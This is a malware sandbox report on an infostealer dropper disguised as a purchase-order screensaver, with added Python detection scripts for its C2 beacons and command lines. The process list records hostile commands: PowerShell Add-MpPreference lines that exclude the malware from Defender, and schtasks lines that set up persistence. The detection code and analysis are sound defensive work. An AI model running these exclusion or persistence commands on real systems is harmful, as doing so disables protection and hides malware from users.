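"""Added example (not part of the Joe Sandbox report): re-parse the captured
requests above and score each one against the traits the two C2 POSTs share."""
import re
import struct

# Request heads copied from the session dumps on this page; bodies are cut to
# their first 12 bytes because the report itself truncates the 850-byte payload.
WECHAT_UA = ("Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
             "Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI "
             "WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400")

CAPTURES = {
    "jpskm.biz": (
        "POST /njuvyxgvhb HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
        "Pragma: no-cache\r\nHost: jpskm.biz\r\nUser-Agent: " + WECHAT_UA + "\r\n"
        "Content-Length: 850\r\n\r\n",
        bytes.fromhex("99d4dc057b3bc53646030000"),
    ),
    "lrxdmhrr.biz": (
        "POST /rmrhacpx HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\n"
        "Pragma: no-cache\r\nHost: lrxdmhrr.biz\r\nUser-Agent: " + WECHAT_UA + "\r\n"
        "Content-Length: 850\r\n\r\n",
        bytes.fromhex("27518503abfc1ea546030000"),
    ),
    "reallyfreegeoip.org": (
        "GET /xml/8.46.123.189 HTTP/1.1\r\nHost: reallyfreegeoip.org\r\n"
        "Connection: Keep-Alive\r\n\r\n",
        b"",
    ),
}

RANDOM_PATH = re.compile(r"^/[a-z]{6,16}$")          # /njuvyxgvhb, /rmrhacpx
WECHAT_MARKERS = re.compile(r"MicroMessenger/|WindowsWechat|QQBrowser/")
GEOIP_HOSTS = {"reallyfreegeoip.org"}                # the one lookup service seen on this page
PREFIX_LEN = 12   # assumption: 8 unknown bytes, then a 4-byte little-endian payload length


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head into method, path and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def declared_payload_len(body_prefix: bytes):
    """Return the little-endian uint32 at bytes 8..11, or None if the body is shorter.
    Assumption: that field is a length (both captured bodies carry 0x346 = 838 there)."""
    if len(body_prefix) < PREFIX_LEN:
        return None
    return struct.unpack_from("<I", body_prefix, PREFIX_LEN - 4)[0]


def beacon_indicators(raw: str, body_prefix: bytes) -> list:
    """Score one request; returns the list of indicator names that fired."""
    req = parse_request(raw)
    h = req["headers"]
    hits = []
    if req["method"] == "POST" and RANDOM_PATH.match(req["path"]):
        hits.append("post-random-lowercase-path")
    if h.get("cache-control") == "no-cache" and h.get("pragma") == "no-cache":
        hits.append("no-cache-header-pair")
    if WECHAT_MARKERS.search(h.get("user-agent", "")):
        hits.append("wechat-style-user-agent")
    declared = declared_payload_len(body_prefix)
    if declared is not None and declared + PREFIX_LEN == int(h.get("content-length", "-1")):
        hits.append("length-field-matches-content-length")
    if req["method"] == "GET" and h.get("host", "").lower() in GEOIP_HOSTS:
        hits.append("geoip-self-lookup")
    return hits


def score_captures(captures=CAPTURES) -> dict:
    """Run beacon_indicators over every capture, keyed by Host."""
    return {host: beacon_indicators(raw, body) for host, (raw, body) in captures.items()}


if __name__ == "__main__":
    for host, hits in score_captures().items():
        print(f"{host:24s} {hits or 'clean'}")
```

Run as-is it prints one line per capture: the two beacons score identically on all four request-shape rules, and the geoip request fires only the self-lookup rule. The User-Agent rule keys on the MicroMessenger, WindowsWechat and QQBrowser tokens rather than the full string, so a rebuilt sample with bumped version numbers still matches; the length-field rule is the one to drop first if a later sample shows the 12-byte prefix assumption does not hold.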


Target ID: 0
Start time: 06:56:57
Start date: 15/01/2025
Path: C:\Users\user\Desktop\PO#_1100015533.scr
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PO#_1100015533.scr" /S
Imagebase: 0xda0000
File size: 1'538'560 bytes
MD5 hash: AC9D898648D7B851BBCCB6F6028D45C6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 2
Start time: 06:57:00
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"
Imagebase: 0x3b0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 4
Start time: 06:57:01
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Imagebase: 0x3b0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true
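The two PowerShell entries above (Defender path exclusions for the dropper and for the copy in AppData\Roaming) and the schtasks.exe entry that follows (a task registered from an XML file in the user's Temp directory) are the defence-evasion and persistence steps of this sample. As an added example that is not part of the Joe Sandbox report, the Python below re-checks those command lines the way a detection rule would: it tokenises the Windows command line, flags Add-/Set-MpPreference with an -Exclusion* parameter, also when the cmdlet is hidden behind -EncodedCommand (base64 of UTF-16LE, which the example decodes), and flags schtasks /Create whose /XML or /TR argument lies in a Temp directory. The three report command lines are copied from the process entries; the encoded variant and the two benign lines are constructed for the negative cases, and the rule names and helper functions are the example's own.

```python
"""Added example, not from the Joe Sandbox report: two detection rules run over
the process command lines listed on this page plus constructed negatives."""
import base64
import re
from pathlib import PureWindowsPath

PS_IMAGE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'

# Sample set: lines marked 'from the report' are the Target ID 2, 4 and 6 command
# lines above and below; the others are constructed for this example.
SAMPLE_CMDLINES = [
    ("target 2 (from the report)",
     PS_IMAGE + r' Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO#_1100015533.scr"'),
    ("target 4 (from the report)",
     PS_IMAGE + r' Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"'),
    ("target 6 (from the report)",
     r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"'),
    ("encoded variant (constructed)",
     PS_IMAGE + " -NoProfile -EncodedCommand " + base64.b64encode(
         'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16le")).decode("ascii")),
    ("benign query (constructed)",
     r'"C:\Windows\System32\schtasks.exe" /Query /TN "Microsoft\Windows\Defrag\ScheduledDefrag"'),
    ("benign read (constructed)", PS_IMAGE + " Get-MpPreference"),
]

TOKEN = re.compile(r'"([^"]*)"|(\S+)')
EXCLUSION_CMDLET = re.compile(r"\b(Add|Set)-MpPreference\b", re.I)
EXCLUSION_PARAM = re.compile(r"-Exclusion(Path|Process|Extension|IpAddress)\b", re.I)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|^[A-Z]:\\Temp\\", re.I)


def tokenize(cmdline: str) -> list:
    """Split a Windows command line on whitespace, honouring and dropping double quotes."""
    return [quoted or bare for quoted, bare in TOKEN.findall(cmdline)]


def decode_encoded_command(tokens: list) -> str:
    """Return the plaintext behind -EncodedCommand (any prefix such as -e, -enc, or -ec).
    powershell.exe takes base64 of the UTF-16LE script; anything that fails to decode is ignored."""
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lower().lstrip("-/")
        if tok.startswith(("-", "/")) and name and ("encodedcommand".startswith(name) or name == "ec"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return ""
    return ""


def detect(cmdline: str) -> list:
    """Apply both rules to one command line; returns the findings (empty when clean)."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = PureWindowsPath(tokens[0]).name.lower()
    findings = []
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(tokens)
        text = cmdline + " " + decoded          # scan the visible and the decoded script together
        if EXCLUSION_CMDLET.search(text) and EXCLUSION_PARAM.search(text):
            findings.append("defender-exclusion-added")
            if decoded:
                findings.append("via-encoded-command")
    elif image == "schtasks.exe":
        lowered = [t.lower() for t in tokens]
        if "/create" in lowered:
            for flag in ("/xml", "/tr"):        # task definition file, or the action it runs
                if flag in lowered and lowered.index(flag) + 1 < len(tokens):
                    if TEMP_DIR.search(tokens[lowered.index(flag) + 1]):
                        findings.append("task-created-from-temp:" + flag)
    return findings


def run_all(samples=SAMPLE_CMDLINES) -> dict:
    """Run detect() over the sample set, keyed by label."""
    return {label: detect(cmd) for label, cmd in samples}


if __name__ == "__main__":
    for label, hits in run_all().items():
        print(f"{label:32s} {hits or 'clean'}")
```

Note that the report's Path column shows SysWOW64 while the command line names System32: the 32-bit dropper spawns 32-bit children and WoW64 file-system redirection resolves the path, so a rule should match on the image name rather than the directory, as detect() does. The Get-MpPreference line is left clean on purpose; reading the configuration is routine, only changing the exclusion list is worth an alert.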

Target ID: 6
Start time: 06:57:01
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp"
Imagebase: 0x610000
File size: 179'712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:8
                                                                                                                                                                                                                                                                        Start time:06:57:03
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\PO#_1100015533.scr
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\PO#_1100015533.scr"
                                                                                                                                                                                                                                                                        Imagebase:0xda0000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.380427536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393694590.0000000002BA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.394485732.0000000003FE7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                        Start time:06:57:04
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\taskeng.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:taskeng.exe {B8732EC0-088E-49BD-8386-4378D1DF7E0C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                                                                                                                                                                                                                                                                        Imagebase:0xff6a0000
                                                                                                                                                                                                                                                                        File size:464'384 bytes
                                                                                                                                                                                                                                                                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                        Start time:06:57:04
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        • Detection: 21%, ReversingLabs
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                        Start time:06:57:05
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:1'290'240 bytes
                                                                                                                                                                                                                                                                        MD5 hash:096F8412E89BED51F0B5E63CFDD50EDA
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                        Start time:06:57:05
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x880000
                                                                                                                                                                                                                                                                        File size:70'656 bytes
                                                                                                                                                                                                                                                                        MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
• Detection: 92%, ReversingLabs
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 06:57:06
Start date: 15/01/2025
Path: C:\Users\user\AppData\Local\Temp\Microsofts.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe"
Imagebase: 0x1270000
File size: 98'816 bytes
MD5 hash: F6B8018A27BCDBAA35778849B586D31B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.643206935.0000000002791000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000000.376399398.0000000001272000.00000020.00000001.01000000.0000000C.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
• Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 91%, ReversingLabs
Reputation: low
Has exited: false

Target ID: 15
Start time: 06:57:07
Start date: 15/01/2025
Path: C:\Windows\System32\alg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\alg.exe
Imagebase: 0x100000000
File size: 1'208'832 bytes
MD5 hash: 194D43897AB889D24B26961F99059037
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

Target ID: 16
Start time: 06:57:09
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Imagebase: 0xcd0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 17
Start time: 06:57:11
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 07:02 /du 23:59 /sc daily /ri 1 /f
Imagebase: 0x6a0000
File size: 179'712 bytes
MD5 hash: 2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 20
Start time: 06:57:13
Start date: 15/01/2025
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
Imagebase: 0x140000000
File size: 1'168'896 bytes
MD5 hash: E77E152A4018445F2DBB4277C818FAEC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
Has exited: false

Target ID: 22
Start time: 06:57:21
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Imagebase: 0xcd0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 06:57:30
Start date: 15/01/2025
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
Imagebase: 0xcd0000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
                                                                                                                                                                                                                                                                        Start time:06:57:24
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\ehome\ehrecvr.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\ehome\ehRecvr.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'276'416 bytes
                                                                                                                                                                                                                                                                        MD5 hash:045A70B9D4D84B036CE87DE912F44EAD
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                        Start time:06:57:26
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\ehome\ehsched.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'256'960 bytes
                                                                                                                                                                                                                                                                        MD5 hash:0D46082BE032D7DA3EE657EA6CE0C32D
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                        Start time:06:57:28
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\FXSSVC.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\fxssvc.exe
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'269'760 bytes
                                                                                                                                                                                                                                                                        MD5 hash:5F010917F62C2D56F7B242050E3524D7
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                        Start time:06:57:29
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\ieetwcollector.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\IEEtwCollector.exe /V
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        File size:1'244'160 bytes
                                                                                                                                                                                                                                                                        MD5 hash:BF5F5556930D8CEF7BBAC46115910CF1
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                        Start time:06:57:32
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\hVVSnrrP" /XML "C:\Users\user\AppData\Local\Temp\tmp2972.tmp"
                                                                                                                                                                                                                                                                        Imagebase:0x690000
                                                                                                                                                                                                                                                                        File size:179'712 bytes
                                                                                                                                                                                                                                                                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                        Start time:06:57:31
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        File size:1'293'312 bytes
                                                                                                                                                                                                                                                                        MD5 hash:5834C05D84CD41A0A0D4619A6C0CB933
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                        Start time:06:57:43
                                                                                                                                                                                                                                                                        Start date:15/01/2025
                                                                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\hVVSnrrP.exe
                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\hVVSnrrP.exe"
                                                                                                                                                                                                                                                                        Imagebase:0x230000
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5 hash:AC9D898648D7B851BBCCB6F6028D45C6
                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:06:57:34
Start date:15/01/2025
Path:C:\Windows\System32\msdtc.exe
Wow64 process (32bit):false
Commandline:C:\Windows\System32\msdtc.exe
Imagebase:0x140000000
File size:1'271'296 bytes
MD5 hash:48149FCDFB3E1B695AD17C25A00F9901
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:39
Start time:06:57:35
Start date:15/01/2025
Path:C:\Windows\System32\msiexec.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\msiexec.exe /V
Imagebase:0x100000000
File size:1'256'960 bytes
MD5 hash:0B127B7A1AB570F72488585B52FA0F77
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:false

Target ID:41
Start time:06:57:38
Start date:15/01/2025
Path:C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):true
